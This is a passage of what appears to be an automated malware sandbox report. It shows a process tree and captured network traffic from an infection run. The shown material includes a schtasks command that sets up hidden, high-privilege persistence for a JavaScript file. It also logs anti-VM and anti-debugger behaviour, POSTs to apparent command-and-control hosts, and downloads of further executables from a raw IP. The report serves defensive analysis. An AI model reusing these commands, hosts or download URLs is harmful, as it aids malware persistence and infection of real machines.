                        cmd /c schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:3748
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
                          3⤵
                          • System Location Discovery: System Language Discovery
                          • Scheduled Task/Job: Scheduled Task
                          PID:1204
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2904 -ip 2904
                      1⤵
                        PID:4412
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2904 -ip 2904
                        1⤵
                          PID:1264
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4764 -ip 4764
                          1⤵
                            PID:3172
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4764 -ip 4764
                            1⤵
                              PID:1308
                            • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                              C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                              1⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • Suspicious behavior: EnumeratesProcesses
                              PID:412
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 1500 -ip 1500
                              1⤵
                                PID:4900
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1500 -ip 1500
                                1⤵
                                  PID:628
                                • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                  C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                  1⤵
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  PID:6604
                                • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                  C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                  1⤵
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  PID:940

                                Network

                                • flag-us
                                  DNS
                                  8.8.8.8.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  8.8.8.8.in-addr.arpa
                                  IN PTR
                                  Response
                                  8.8.8.8.in-addr.arpa
                                  IN PTR
                                  dnsgoogle
                                • flag-us
                                  DNS
                                  58.55.71.13.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  58.55.71.13.in-addr.arpa
                                  IN PTR
                                  Response
                                • flag-us
                                  DNS
                                  172.214.232.199.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  172.214.232.199.in-addr.arpa
                                  IN PTR
                                  Response
                                • flag-us
                                  DNS
                                  74.32.126.40.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  74.32.126.40.in-addr.arpa
                                  IN PTR
                                  Response
                                • flag-us
                                  DNS
                                  95.221.229.192.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  95.221.229.192.in-addr.arpa
                                  IN PTR
                                  Response
                                • flag-us
                                  DNS
                                  atten-supporse.biz
                                  f56e441c8f.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  atten-supporse.biz
                                  IN A
                                  Response
                                  atten-supporse.biz
                                  IN A
                                  172.67.165.166
                                  atten-supporse.biz
                                  IN A
                                  104.21.16.9
                                • flag-us
                                  POST
                                  https://atten-supporse.biz/api
                                  2M4078.exe
                                  Remote address:
                                  172.67.165.166:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: atten-supporse.biz
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:16:46 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=np5mi08ag95r85e7h2ahahkash; expires=Mon, 31-Mar-2025 20:03:24 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vcQV1X2sxX9BD%2F74PIiIjziQ5zVSQvJfO4v9pxMhwYISPPQf%2F34z4qoNZAXv5YkTRC0uYA0xs09%2F1aMPWf8Rl26Tn1MZzpi4aCNqcwTwdTQDnVBO3WajOIBsNN9hWaiqHvoPzFI%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c693992a79b9-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=50804&min_rtt=47108&rtt_var=16991&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3305&recv_bytes=609&delivery_rate=78569&cwnd=253&unsent_bytes=0&cid=67458e59cf7a0084&ts=830&x=0"
                                • flag-us
                                  DNS
                                  166.165.67.172.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  166.165.67.172.in-addr.arpa
                                  IN PTR
                                  Response
                                • flag-us
                                  DNS
                                  se-blurry.biz
                                  f56e441c8f.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  se-blurry.biz
                                  IN A
                                  Response
                                  se-blurry.biz
                                  IN A
                                  104.21.81.153
                                  se-blurry.biz
                                  IN A
                                  172.67.162.65
                                • flag-us
                                  POST
                                  https://se-blurry.biz/api
                                  2M4078.exe
                                  Remote address:
                                  104.21.81.153:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: se-blurry.biz
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:16:46 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=t77q405in732gupjvlvg4eajvq; expires=Mon, 31-Mar-2025 20:03:25 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VEgta8%2Fy0xbvCi72BnCjbDEkdEFHoZ7113eVpSlqHBek0VRoMeLT02SdAm2aP5AHmhCZuamnYsgUfMI8puWlwBgb0ebfULMVnRYJ%2BNUAgQg%2BFBOvpnDQ7v6mJnQ0mSlE"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c699aebdbeb4-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=49600&min_rtt=47220&rtt_var=13953&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3288&recv_bytes=599&delivery_rate=79367&cwnd=253&unsent_bytes=0&cid=f9ce394433378792&ts=576&x=0"
                                • flag-ru
                                  POST
                                  http://185.215.113.43/Zu7JuNko/index.php
                                  skotes.exe
                                  Remote address:
                                  185.215.113.43:80
                                  Request
                                  POST /Zu7JuNko/index.php HTTP/1.1
                                  Content-Type: application/x-www-form-urlencoded
                                  Host: 185.215.113.43
                                  Content-Length: 4
                                  Cache-Control: no-cache
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Fri, 06 Dec 2024 02:16:46 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Refresh: 0; url = Login.php
                                • flag-ru
                                  POST
                                  http://185.215.113.43/Zu7JuNko/index.php
                                  skotes.exe
                                  Remote address:
                                  185.215.113.43:80
                                  Request
                                  POST /Zu7JuNko/index.php HTTP/1.1
                                  Content-Type: application/x-www-form-urlencoded
                                  Host: 185.215.113.43
                                  Content-Length: 158
                                  Cache-Control: no-cache
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Fri, 06 Dec 2024 02:16:47 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                • flag-ru
                                  POST
                                  http://185.215.113.43/Zu7JuNko/index.php
                                  skotes.exe
                                  Remote address:
                                  185.215.113.43:80
                                  Request
                                  POST /Zu7JuNko/index.php HTTP/1.1
                                  Content-Type: application/x-www-form-urlencoded
                                  Host: 185.215.113.43
                                  Content-Length: 31
                                  Cache-Control: no-cache
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Fri, 06 Dec 2024 02:16:51 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                • flag-ru
                                  POST
                                  http://185.215.113.43/Zu7JuNko/index.php
                                  skotes.exe
                                  Remote address:
                                  185.215.113.43:80
                                  Request
                                  POST /Zu7JuNko/index.php HTTP/1.1
                                  Content-Type: application/x-www-form-urlencoded
                                  Host: 185.215.113.43
                                  Content-Length: 31
                                  Cache-Control: no-cache
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Fri, 06 Dec 2024 02:16:55 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                • flag-ru
                                  POST
                                  http://185.215.113.43/Zu7JuNko/index.php
                                  skotes.exe
                                  Remote address:
                                  185.215.113.43:80
                                  Request
                                  POST /Zu7JuNko/index.php HTTP/1.1
                                  Content-Type: application/x-www-form-urlencoded
                                  Host: 185.215.113.43
                                  Content-Length: 31
                                  Cache-Control: no-cache
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Fri, 06 Dec 2024 02:17:02 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                • flag-ru
                                  POST
                                  http://185.215.113.43/Zu7JuNko/index.php
                                  skotes.exe
                                  Remote address:
                                  185.215.113.43:80
                                  Request
                                  POST /Zu7JuNko/index.php HTTP/1.1
                                  Content-Type: application/x-www-form-urlencoded
                                  Host: 185.215.113.43
                                  Content-Length: 31
                                  Cache-Control: no-cache
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Fri, 06 Dec 2024 02:17:07 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                • flag-ru
                                  POST
                                  http://185.215.113.43/Zu7JuNko/index.php
                                  skotes.exe
                                  Remote address:
                                  185.215.113.43:80
                                  Request
                                  POST /Zu7JuNko/index.php HTTP/1.1
                                  Content-Type: application/x-www-form-urlencoded
                                  Host: 185.215.113.43
                                  Content-Length: 31
                                  Cache-Control: no-cache
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Fri, 06 Dec 2024 02:17:36 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                • flag-ru
                                  POST
                                  http://185.215.113.43/Zu7JuNko/index.php
                                  skotes.exe
                                  Remote address:
                                  185.215.113.43:80
                                  Request
                                  POST /Zu7JuNko/index.php HTTP/1.1
                                  Content-Type: application/x-www-form-urlencoded
                                  Host: 185.215.113.43
                                  Content-Length: 31
                                  Cache-Control: no-cache
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Fri, 06 Dec 2024 02:17:39 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                • flag-ru
                                  POST
                                  http://185.215.113.43/Zu7JuNko/index.php
                                  skotes.exe
                                  Remote address:
                                  185.215.113.43:80
                                  Request
                                  POST /Zu7JuNko/index.php HTTP/1.1
                                  Content-Type: application/x-www-form-urlencoded
                                  Host: 185.215.113.43
                                  Content-Length: 31
                                  Cache-Control: no-cache
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Fri, 06 Dec 2024 02:17:45 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                • flag-ru
                                  POST
                                  http://185.215.113.43/Zu7JuNko/index.php
                                  skotes.exe
                                  Remote address:
                                  185.215.113.43:80
                                  Request
                                  POST /Zu7JuNko/index.php HTTP/1.1
                                  Content-Type: application/x-www-form-urlencoded
                                  Host: 185.215.113.43
                                  Content-Length: 31
                                  Cache-Control: no-cache
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Fri, 06 Dec 2024 02:17:48 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                • flag-us
                                  DNS
                                  zinc-sneark.biz
                                  f56e441c8f.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  zinc-sneark.biz
                                  IN A
                                  Response
                                  zinc-sneark.biz
                                  IN A
                                  172.67.136.167
                                  zinc-sneark.biz
                                  IN A
                                  104.21.62.142
                                • flag-us
                                  POST
                                  https://zinc-sneark.biz/api
                                  2M4078.exe
                                  Remote address:
                                  172.67.136.167:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: zinc-sneark.biz
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:16:47 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=3u683q1d15ucurrobrb5t6t4b2; expires=Mon, 31-Mar-2025 20:03:26 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iyvVExUMhOLl%2BCwFZj77s4IPrn5FIFBx%2BKFsYvrfxdetImsqE4bqsG%2BDSsF22Yd52Dnk9w%2Bl8a6UV8ooDV7gQB77e7X4GDUCToTXl4qmopzXZdufAn%2FX2yEf0lou0wjLpk0%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c69e1fb5ef2f-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=47649&min_rtt=46710&rtt_var=11301&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3297&recv_bytes=603&delivery_rate=76854&cwnd=253&unsent_bytes=0&cid=371bff5f59bad0dd&ts=367&x=0"
                                 • US
                                  DNS
                                  153.81.21.104.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  153.81.21.104.in-addr.arpa
                                  IN PTR
                                  Response
                                 • US
                                  DNS
                                  104.219.191.52.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  104.219.191.52.in-addr.arpa
                                  IN PTR
                                  Response
                                 • US
                                  DNS
                                  43.113.215.185.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  43.113.215.185.in-addr.arpa
                                  IN PTR
                                  Response
                                 • US
                                  DNS
                                  dwell-exclaim.biz
                                  f56e441c8f.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  dwell-exclaim.biz
                                  IN A
                                  Response
                                  dwell-exclaim.biz
                                  IN A
                                  172.67.153.96
                                  dwell-exclaim.biz
                                  IN A
                                  104.21.88.210
                                 • US
                                  POST
                                  https://dwell-exclaim.biz/api
                                  2M4078.exe
                                  Remote address:
                                  172.67.153.96:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: dwell-exclaim.biz
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:16:49 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=7fhlk0thjvqhibfb2k0aalg714; expires=Mon, 31-Mar-2025 20:03:26 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2NxZgA4dtNBLCi7NA5jAxv2lhSBSa761cK9f5Xx4CkWN6r4p3fFxFpyDu51XvhU0W3wqfBIXgEZXWc93l9fOdD7eakm%2Br01yeqI6X2b%2FoL%2FmFaA%2F2Gcy3UMhnS40eNj2wIbxZA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c6a14acdf658-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=50051&min_rtt=48885&rtt_var=11808&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3304&recv_bytes=607&delivery_rate=77511&cwnd=253&unsent_bytes=0&cid=6756a521a387c1b3&ts=1884&x=0"
                                 • RU
                                  GET
                                  http://31.41.244.11/files/7427009775/BhD8htX.exe
                                  skotes.exe
                                  Remote address:
                                  31.41.244.11:80
                                  Request
                                  GET /files/7427009775/BhD8htX.exe HTTP/1.1
                                  Host: 31.41.244.11
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Fri, 06 Dec 2024 02:16:48 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 1823744
                                  Last-Modified: Wed, 04 Dec 2024 15:54:54 GMT
                                  Connection: keep-alive
                                  ETag: "67507b4e-1bd400"
                                  Accept-Ranges: bytes
                                 • RU
                                  GET
                                  http://31.41.244.11/files/151334531/i1A5m12.exe
                                  skotes.exe
                                  Remote address:
                                  31.41.244.11:80
                                  Request
                                  GET /files/151334531/i1A5m12.exe HTTP/1.1
                                  Host: 31.41.244.11
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Fri, 06 Dec 2024 02:16:51 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 3540214
                                  Last-Modified: Thu, 05 Dec 2024 12:33:42 GMT
                                  Connection: keep-alive
                                  ETag: "67519da6-3604f6"
                                  Accept-Ranges: bytes
                                 • RU
                                  GET
                                  http://31.41.244.11/files/1818813749/wL3EGdM.exe
                                  skotes.exe
                                  Remote address:
                                  31.41.244.11:80
                                  Request
                                  GET /files/1818813749/wL3EGdM.exe HTTP/1.1
                                  Host: 31.41.244.11
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Fri, 06 Dec 2024 02:16:55 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 7284070
                                  Last-Modified: Fri, 06 Dec 2024 00:48:14 GMT
                                  Connection: keep-alive
                                  ETag: "675249ce-6f2566"
                                  Accept-Ranges: bytes
                                 • RU
                                  GET
                                  http://31.41.244.11/files/unique2/random.exe
                                  skotes.exe
                                  Remote address:
                                  31.41.244.11:80
                                  Request
                                  GET /files/unique2/random.exe HTTP/1.1
                                  Host: 31.41.244.11
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Fri, 06 Dec 2024 02:17:45 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 1945088
                                  Last-Modified: Fri, 06 Dec 2024 00:56:10 GMT
                                  Connection: keep-alive
                                  ETag: "67524baa-1dae00"
                                  Accept-Ranges: bytes
                                 • US
                                  DNS
                                  167.136.67.172.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  167.136.67.172.in-addr.arpa
                                  IN PTR
                                  Response
                                 • US
                                  DNS
                                  96.153.67.172.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  96.153.67.172.in-addr.arpa
                                  IN PTR
                                  Response
                                 • US
                                  DNS
                                  11.244.41.31.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  11.244.41.31.in-addr.arpa
                                  IN PTR
                                  Response
                                 • US
                                  DNS
                                  formy-spill.biz
                                  f56e441c8f.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  formy-spill.biz
                                  IN A
                                  Response
                                  formy-spill.biz
                                  IN A
                                  172.67.173.74
                                  formy-spill.biz
                                  IN A
                                  104.21.96.55
                                 • US
                                  POST
                                  https://formy-spill.biz/api
                                  2M4078.exe
                                  Remote address:
                                  172.67.173.74:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: formy-spill.biz
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:16:51 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=onkg82f9nb1ad0d5c5gjkr64sg; expires=Mon, 31-Mar-2025 20:03:28 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a9oOtqe%2BkNyCpK3yNQqvGI7tHP%2FbqT0Erto8BCqxrLIt9wcvVbFriVd6PTimNqGDvCgRQOv1jrdKtNCuIJmy5NRGj0is1hkAf9Z1pypPAOCeLOTf%2B2Prz%2BXmvSAfTla596k%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c6ae0f8194f1-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=47769&min_rtt=47240&rtt_var=10779&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3293&recv_bytes=603&delivery_rate=79978&cwnd=253&unsent_bytes=0&cid=fdb515902ab1b8e6&ts=1847&x=0"
                                 • US
                                  DNS
                                  74.173.67.172.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  74.173.67.172.in-addr.arpa
                                  IN PTR
                                  Response
                                 • US
                                  DNS
                                  ratiomun.cyou
                                  BhD8htX.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  ratiomun.cyou
                                  IN A
                                  Response
                                 • US
                                  POST
                                  https://se-blurry.biz/api
                                  BhD8htX.exe
                                  Remote address:
                                  104.21.81.153:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: se-blurry.biz
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:16:52 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=97b20vk5aco75sp8d185isfucn; expires=Mon, 31-Mar-2025 20:03:29 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tdRJlyJ0iR1h87FjVebn8irzj6xtvZ7lviGegQ89bXXPMGlOJ3TCf5LF%2F6ex8YVdPItePnJo05qjasLxya5INwBGmAumpypQsX4tOFlzmKL00gS3C25nDsK5i4yYy1WM"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c6b5ae5894a6-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=50645&min_rtt=46969&rtt_var=17112&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3289&recv_bytes=599&delivery_rate=83046&cwnd=253&unsent_bytes=0&cid=ed8588ed44464fdc&ts=1573&x=0"
                                 • US
                                  DNS
                                  covery-mover.biz
                                  f56e441c8f.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  covery-mover.biz
                                  IN A
                                  Response
                                  covery-mover.biz
                                  IN A
                                  172.67.206.64
                                  covery-mover.biz
                                  IN A
                                  104.21.58.186
                                 • US
                                  POST
                                  https://covery-mover.biz/api
                                  2M4078.exe
                                  Remote address:
                                  172.67.206.64:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: covery-mover.biz
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:16:52 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=5kt6n0hirdgcaoc6k1mv87k070; expires=Mon, 31-Mar-2025 20:03:30 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wGc6PlAZYnl0AnjJYJPqM3NKJ0%2FaZAV2yKzjCFNH2U%2B2xUZWD4C8uJAsMf%2F0Dy5n8nZKsMuEq82QCe3AOmptyn2BtpTf726ln%2FhHnHSWHnGozFULakW5FwA7adS1ae7KHYue"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c6ba9d18651f-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=50893&min_rtt=47007&rtt_var=15886&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3299&recv_bytes=605&delivery_rate=70150&cwnd=253&unsent_bytes=0&cid=178e41ad20492377&ts=1219&x=0"
                                 • US
                                  POST
                                  https://zinc-sneark.biz/api
                                  BhD8htX.exe
                                  Remote address:
                                  172.67.136.167:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: zinc-sneark.biz
